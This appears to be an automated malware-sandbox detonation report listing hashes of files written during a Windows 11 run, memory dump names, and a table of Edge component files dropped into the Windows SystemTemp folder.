| SHA512 | 11641d505b15446ae6670dfd8bbad8eb7edbd0bcdc342243c058bf0f4e872a84e4f74afec16be50874c3c1b9d36a2505f341196dea5b46c796f1b66b210428ea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 90a5606583dbb1614bf2b8c9918acfa6 |
| SHA1 | ecb19923d93c48dbd53eeb222f373802c8a13970 |
| SHA256 | 2664189f9ea49ef5dc74af1c36f02a882d371aca227ecff651a43ecccc943f5d |
| SHA512 | d96814eccabaaf7177e31a34e2999a319da291c7c1ee4f88321947d5a083e35056f3cd7246afdad59e4f34be36262a0a4d75f114b1fd6e9ae1ea561cbfb37a4b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 3cafc2964fcc514fb3e921fa2428e927 |
| SHA1 | 3d9fa5cc36e2bf3cfefeb84a359040628ac05d32 |
| SHA256 | b202fbf52d09ec5178b4c4a410fe9cc0728a3e7886a5c8c825ede2bd7e30955a |
| SHA512 | f13f3b167e7359182e31143aa23198dc25f3899aa71758a98571934de11d0bacdb1388f93932f7fd1895dee414079386c588e9c172d3b454b7af940954c6b591 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 15456c0e9e99303b886b7054147b9792 |
| SHA1 | 0e3c4976dc35cf03952cb71dad2754c18b023a9b |
| SHA256 | 61ca7583103c9963ecac22b8c5be4e431b4a03ca0a83fb1984d1bb8d2439b7ee |
| SHA512 | 0e8de26cdea35dd5981b0519b514d0d07ba9c1888ebc2a07286fb721896ec62700598e6036ea8a5245e07422019190c4dd247e6705c7671da926784907f76e99 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | daa96fdb1342d7a49a350ca72f29e629 |
| SHA1 | f80628757e488eb00d3f550bca265d8c0b205d54 |
| SHA256 | b20f0ee910e6da19fc2dd893076715cb514bc4e0ab58a808df6141053cda96e7 |
| SHA512 | 164081123e8a085b7ac008b3aa1b79b411a4cf8f3554e27c9ac4ac7b2e82272d6e27d5fd80477d292ef92f75c5512724a4fd55fb6d93daec3b4530721cfc691b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old
| MD5 | dd616b1ac33c823762bae6902222f878 |
| SHA1 | cff9f27788f0442abb44ebf03a2c5c935caf7439 |
| SHA256 | fbcf4df43de9eb727ed31ffa93c0fb0ccda804394e2090a3a982f67f8cc31994 |
| SHA512 | 63aaa9e6fad3270b997c0691d8acfc8595ca15b33a574a6773d5f53bb6b1c18d9b35bc4445c8f569b7e1c51be27f8c839be0f85601e3d3117553114d5a5bb4ea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 3d77be4e6fb0f8a3c56d9c92f75238f5 |
| SHA1 | e90d47a05d3fe08d2d470f9a9eca074a9e3d3e05 |
| SHA256 | 870a8545b4b771c55b292d0f1211ac5854c8271c7d40c6346d97acc0b06ebc32 |
| SHA512 | f15204efb70fdfcfaf329c79640e5764710c13369c29152ee3c37ae7e9a6aa0e4b870b52939b3f7b484398caffd00a0712cceaa8125974f3e1da23d62cc04cf6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 1cc0e3d523ed52009ec29842686d4e6e |
| SHA1 | b79ae6892a271bc3ca6eea6ec5f5fbb223b49e46 |
| SHA256 | c3162f63e3975c7fc7a50ad1cd2e1de1771304b661b5134030ed30ede8396fb9 |
| SHA512 | 489cf0df9600abe52e72aefeadc7cb321ec9b76a609772d270a08a9bba05a6850e2733ce275a085d56861c90bb41c186c3ab40cbad09b8c0c48c83b53eade214 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tweysowi.kja.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4276-968-0x00000252537D0000-0x00000252537F2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8afaaea552ecbc45e03f751611272c18 |
| SHA1 | 8b038e38ee52b080fbc0424c7afe720a6044be77 |
| SHA256 | 71924716e2eb2afb5946370bb9e2941051a338765ac99b8e7dbb54afcb92f822 |
| SHA512 | 83f328e1e874c2b40155e68873dc6b0096ae335fd2c69d5c71fe177e85aec3e509c4af16460c1741b31b2d6dd02b239e909380bb30a4d1411e55accc22190509 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ed30ca9187bf5593affb3dc9276309a6 |
| SHA1 | c63757897a6c43a44102b221fe8dc36355e99359 |
| SHA256 | 81fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122 |
| SHA512 | 1df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e26e403816be0b5fca11ea013456c7a8 |
| SHA1 | 2d6708815cc44fb5381e22253714e447c6fe683f |
| SHA256 | 7cdfc0addfbe865ac74595ecb178fae604e83fcfbdc91b09646aadbb9b31d89b |
| SHA512 | 08928269fd35753be0e20f534f9af27441a5e7a901248c77c4627c3b6fc626cd9d4f4fc60e009d4a843987e69376953073834e9f36ced3415b0f44ff16bde7f5 |
\??\c:\Users\Admin\AppData\Local\Temp\zceahbm0\zceahbm0.cmdline
| MD5 | 019c97092f2887dd7be96fd93f88159b |
| SHA1 | 5db99c00e4657cf2648c09fa16f70a2fbada2337 |
| SHA256 | d7671dacd6c78a9b00a7ee88261d576cbfc5edb79dbd0d5365996c69f919c4b2 |
| SHA512 | 90978f369f3d7c6ddfa5547be96a8c400bd9eaa42fdc8f01ef5bf12629110e88b97585f3a9a395b9283b7d8708c4cbba0151b84f92d98aaff9cc10142df2e6d0 |
\??\c:\Users\Admin\AppData\Local\Temp\zceahbm0\zceahbm0.0.cs
| MD5 | 4f82245a7a697114c52993b33e0d7e17 |
| SHA1 | 35777a662a7bc4d11ec707ea8f4c9e4ea76d6f8c |
| SHA256 | 14f48c464ca2f67403f96d9e1a802f3fef062e68aea24c36abf51bf0e038010f |
| SHA512 | 59021c09bfb8405d5a8448c4d9adbac9b98af8b088cbad6cef2ae9018823e52fd4690f63bce652409ef5b385d1a63a69c20629278e172c988910ac0f22cc6020 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | f62195fefaa65c5acfcf944cf3b76108 |
| SHA1 | 6baed5a04e3419c9be4582b74a4480590e4a3ad6 |
| SHA256 | d048490e60db3268bd04d75c3c4f8434fea474150fc1e987ae4f6cfd140143ab |
| SHA512 | 46e89e42f8c918354e652499d3acc542f1a53bfdda3b6622845b40ad4f7cc07b1a2ee1363b2bac4453a01f69802fd3b37b448c09780b244515a5f400b8aa5bda |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 181bdc50407bf93657f4a846cc6cd613 |
| SHA1 | 36078691dedef93c030b0b2d1b66ffbae34a536a |
| SHA256 | e925db843a8bd0fa1b05c769f3cb24089f6fe9997a5411ac2e6a8ae15af5ee63 |
| SHA512 | 94c0e4298636e1e21f6f69bb320dbe5ea4f34bded1988f7292502b9aba926fed5fe34258b4296ca13b092795feee5b95369f354033d3931d34930cb048e06849 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 04d926e920daa8edf6cd17ea77dce267 |
| SHA1 | f944b3805e290fc6eafee7658fedab9b90d8fdbd |
| SHA256 | e5b5aba68bdaf1614dfb3fd48b99452a0c7f096f05542d5b1f71e7fd73235379 |
| SHA512 | 4d3a35178273656335f2072aa92a09bd8eef3d8f366fd4a36e81d638a4fd4be2a296f0b388ce8eb64f50604e018a7ba434afb0e71ba0da82e325e235ca225c9d |
memory/908-1048-0x000001B5221A0000-0x000001B522316000-memory.dmp
memory/908-1049-0x000001B522530000-0x000001B52273A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | cf78923b1061eb5c2425ab720d52f025 |
| SHA1 | f1d2b9e827c4aeed8e74926ab7f2f8e773c4ce20 |
| SHA256 | 55329a3f6fa53319f94ae1beda9da4cd32ecace3f132065e90b8713dd0a27480 |
| SHA512 | 04728ffb7576a1e3caf252323a137c62bac1f346cea5dcc2819554ec5b7b37a9599f5c69e2e99ad48d86e32c95f7bce0964fe6f5753d5f7645585c48e819c9d1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6b3ef4d4af10624d7d79ee2a64144b36 |
| SHA1 | 62e7cdb46baf99780d90d49f01b4986ce55ee2d9 |
| SHA256 | b596e1bee1b9df4dcedbd40e613689f60d4e8019b66a1cb985823c1e534875d2 |
| SHA512 | 330ed7bbc09adf7db2d321fcbb2cabf02781e05881d2623868320f9490f9ff82377db869df4e718485858b62ec05c016b08d03b2015b266bba67dfc5819eec62 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
| MD5 | b016a2a37b83156a43dc509712c9468a |
| SHA1 | a6ac6b50452acedffa2cb70936d4b6c19a1425a5 |
| SHA256 | b3ef033b660d0a1a9344193497e8920d4a831d46ecfe73344bb8bea07ef94e64 |
| SHA512 | 121467315ac8d3b9dbf3495105fd69cb9b1c9c5b08e8d50c5fb6311afbee9d15b1b51cbb1b9329c0a211e5c088e942f70e990c08ccc0adb28eab9585e3c06fb8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | fe437529e0ecb65f8ea2cc50daea3899 |
| SHA1 | 2faeeef44602621742c2fb9a90bc1517c1e0c29b |
| SHA256 | b05940392ccaa815aac800b3aa86a381c617054e3c4bfe121a437bab36dd6789 |
| SHA512 | b3b85b83e73227162f6f5324f0b4aa9ac45919dbb81367e3545ab60a770f9a15984de3a9da279d5c873788e5db4e9ae3e15cea981ab0cef18742d0a74c0f7080 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations
| MD5 | 961e3604f228b0d10541ebf921500c86 |
| SHA1 | 6e00570d9f78d9cfebe67d4da5efe546543949a7 |
| SHA256 | f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed |
| SHA512 | 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 3e45022839c8def44fd96e24f29a9f4b |
| SHA1 | c798352b5a0860f8edfd5c1589cf6e5842c5c226 |
| SHA256 | 01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd |
| SHA512 | 2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1
| MD5 | 3d446ab117aad530e6c654ca79e2b4c9 |
| SHA1 | 41783e7a60b076d961d56ce92586bdb393dcacd5 |
| SHA256 | af6bd4eed84a3e7c68d45b48c3c69b7db4caa27529bd7649b5e3b94630b3976d |
| SHA512 | 4a3eedf24363f02efd4447981fc6c8ddebaf8bc578e89a9e3d49c0492532257469bbc4766d9b8728dfa27afc230a367251c870d05e95a3d36e189dd154cbc526 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\60ef4b21-9300-4ed9-8ef6-b64d7514b364.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | ed236d6575f8011412f6351562b1b8b0 |
| SHA1 | 38c27e928ac95be7145c4dcdc2677bf9cdf7fc00 |
| SHA256 | 8079efb1a004df3ac4a9a669075a157f384039046d55f3ba940da47f440ebed2 |
| SHA512 | 65ad571e3401702ea7859192e250a8183978790e79cba83885e93a37a126c107b3fd23ba96e97bda9721fff1319347bd9fb9e9fabe3b3967b9ab3a414e9729d1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons
| MD5 | d0eaa172f3bbf72652359b70b4ebf9f4 |
| SHA1 | b00788054f525e931158ac78f0ada17d6789d8f6 |
| SHA256 | 5fae474698a5c75799e4f9f6e4a7fab926372d177904dbc4e4c4af4f036fc807 |
| SHA512 | 259b06dde9049b471b5e6b068fdd581e1b5fa757fec4a600fb5c7c933abed4f95dd0c5b941fd0dac7a30414c968297036c7eac1e92dec840ac07a701034f3624 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
| MD5 | 3cf3cbfee9d8cff26a4c0eca5bcf3be9 |
| SHA1 | 90df1446ade1d5f937d04cce1ccc6e92392bd650 |
| SHA256 | 1f0281dca0fbbcc2466d26d6601e2e8d098bfb3a476aea61fd957a8a12630859 |
| SHA512 | 7654b0392ecc0ee7b2d3fa24d802b3a34139947ed6c746561cb0803ac9b6df9e6fecb2c0d18a0d5d3549921fe197663fb358537dea57fdf504b656622d675760 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3
| MD5 | e9122de20589855e9b8f3dd1f03fb6b2 |
| SHA1 | 309046468630758be927857fa4f7f1f05f8d265b |
| SHA256 | c98798142aef34e3e7b3d0cb863a598cc20660bbeb3d8771f0c32529ccfb7cee |
| SHA512 | 0145adb36d96b96cf734d6d71900c14def03a5925eede53c854899500a91f3dba342aadc741228f8d611fdf2c3759a83a176eeaa7c6d2aed5617f7f49a8c8724 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_2
| MD5 | 67c31d3cd30537e69a765495ee0374ae |
| SHA1 | b4ab8e0c8632c8ee70d7feedc342e98c79017e6c |
| SHA256 | 879525d0246352d78965eb76a9904cae571648f65973e9c62601bc2c46fdc426 |
| SHA512 | 30f386d835a14f19fd9e84b90f76b7cff74adf5f6311ccf1166afa399dc7f4e20708519a1aa44d957184af4ebcab6dcb5ee760324969ac2e105c80a2dba02481 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1
| MD5 | 3984094cc81f436705429ed63ebbfa3b |
| SHA1 | 59d9989298a826912387ccc6e6ce3f4d7e8d9a9f |
| SHA256 | 46a8361584e71613d8a6a3f3e850458a09ce8fef4a35917fceb77d51ad80397b |
| SHA512 | e184dfceeba8b91181f1157b21237a0d7841b5a0de594d1017e9a62d114d819501770dbe0a520401689bdf60e7023822000d84744a6f3d5328daee27241ae79f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0
| MD5 | 13b477494b9d13398def88761acf707d |
| SHA1 | b8ed7fd5dbe57cf75ba818b68eaccc4487f3024f |
| SHA256 | be46dd69fcf95cde897ff83ae92f388d52a4aec19c0056eee747b5984c4924ce |
| SHA512 | ad897cce1b48c83b9472c5f71fb03b308cf6082b8d42a6ef4dbdeb7df6a3d801153d5154c004b776dd3d59abe1c8df40cf666ceafbb72bb59b74bcc442104652 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
| MD5 | 2fa8f38fc092da1f08851e0f43f21655 |
| SHA1 | b28f702cc5c141be03c5b90b5d9a19ec32ca669f |
| SHA256 | 522358b7bcfc84b165a51bffb00395fbcee4dffb7d91fd838273d4b2b1985e2b |
| SHA512 | 1aa08e61467d1b6630b42274c4144aa4bae7a7c65403f868b7f1bdeddae7822807f43d06ff62ace56a3870222519d279823bf9aa3cf9a39cf017fad735d94104 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG
| MD5 | 780011c229d086a700f108aece7f2ecc |
| SHA1 | f169eaace2e4ded113b886995474f172beba54b0 |
| SHA256 | 735bb2271114bc0faab70fdb7f2645236e2d341c1d978ce59d99b9f740668da4 |
| SHA512 | 9631eecaf17bd59dc212864a406a86d825c5e887c5595303d067e3aff13471ac60b3d48b1c74b0e74ff8d38f1cdb624437b3c385b46a9e32fe88a05917e84886 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
| MD5 | 1464f3d0dc3d4ccf0dd69d764502f0f7 |
| SHA1 | 089e24b41888bb17c293c3423b796234f69c5b90 |
| SHA256 | f4aa2bd531ea193b23fa841dff1f4de9038e58b4eec5d66bf28b2ee9cc31a17c |
| SHA512 | 1168493b8c8b7fafc4439e93926aeb1bb445df6e88b7ce01b1b8594c8e6908fe826b00dc7cb04ae247919dcdb02faa15718a2527775e11a117e283970ead9dca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0524c92c95ae22d4f59e3a97b47744ff |
| SHA1 | b5bfc1a1bafe619b75255161b0a295956a28cf9e |
| SHA256 | 61e7d262c220c13fc9aa6bc6d35af2e94cb43bee7de3b90840cb7a905769676c |
| SHA512 | 74cb6174ba92659c9011afd13b0460753bfe499183d577097251fa8dbfda9a71796dc80d3a00b9933b42d3d6dd386725439d485b96d90e9783dc2c1c6ba315a5 |
Analysis: behavioral3
Detonation Overview
Submitted
2025-05-02 10:53
Reported
2025-05-02 10:58
Platform
win11-20250410-en
Max time kernel
300s
Max time network
302s
Command Line
Signatures
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\tr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\gu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\ru\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1284367089\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1284367089\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\pt_BR\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\bn\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\en_GB\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\fr_CA\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\sv\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\zh_CN\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\offscreendocument.html | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\af\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\zh_TW\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\gl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\th\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\ne\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\it\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\lv\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1284367089\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1300582806\deny_etld1_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1300582806\deny_full_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_762581888\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\fi\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\pa\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\hi\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\pl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\fr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\hu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\be\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_762581888\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\sk\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\bg\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\da\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\hr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1300582806\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1096096730\passwords.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1096096730\surnames.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1096096730\us_tv_and_film.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\am\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\fil\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\vi\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\dasherSettingSchema.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1284367089\sets.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1284367089\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_1300582806\deny_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_762581888\typosquatting_list.pb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\es_419\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\sr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\uk\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\et\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\sl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\page_embed_script.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\mr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\no\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\msedge_url_fetcher_5968_1715272222\GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_91_1_0.crx | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\pt_PT\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\es\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\ar\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5968_828600414\_locales\nl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
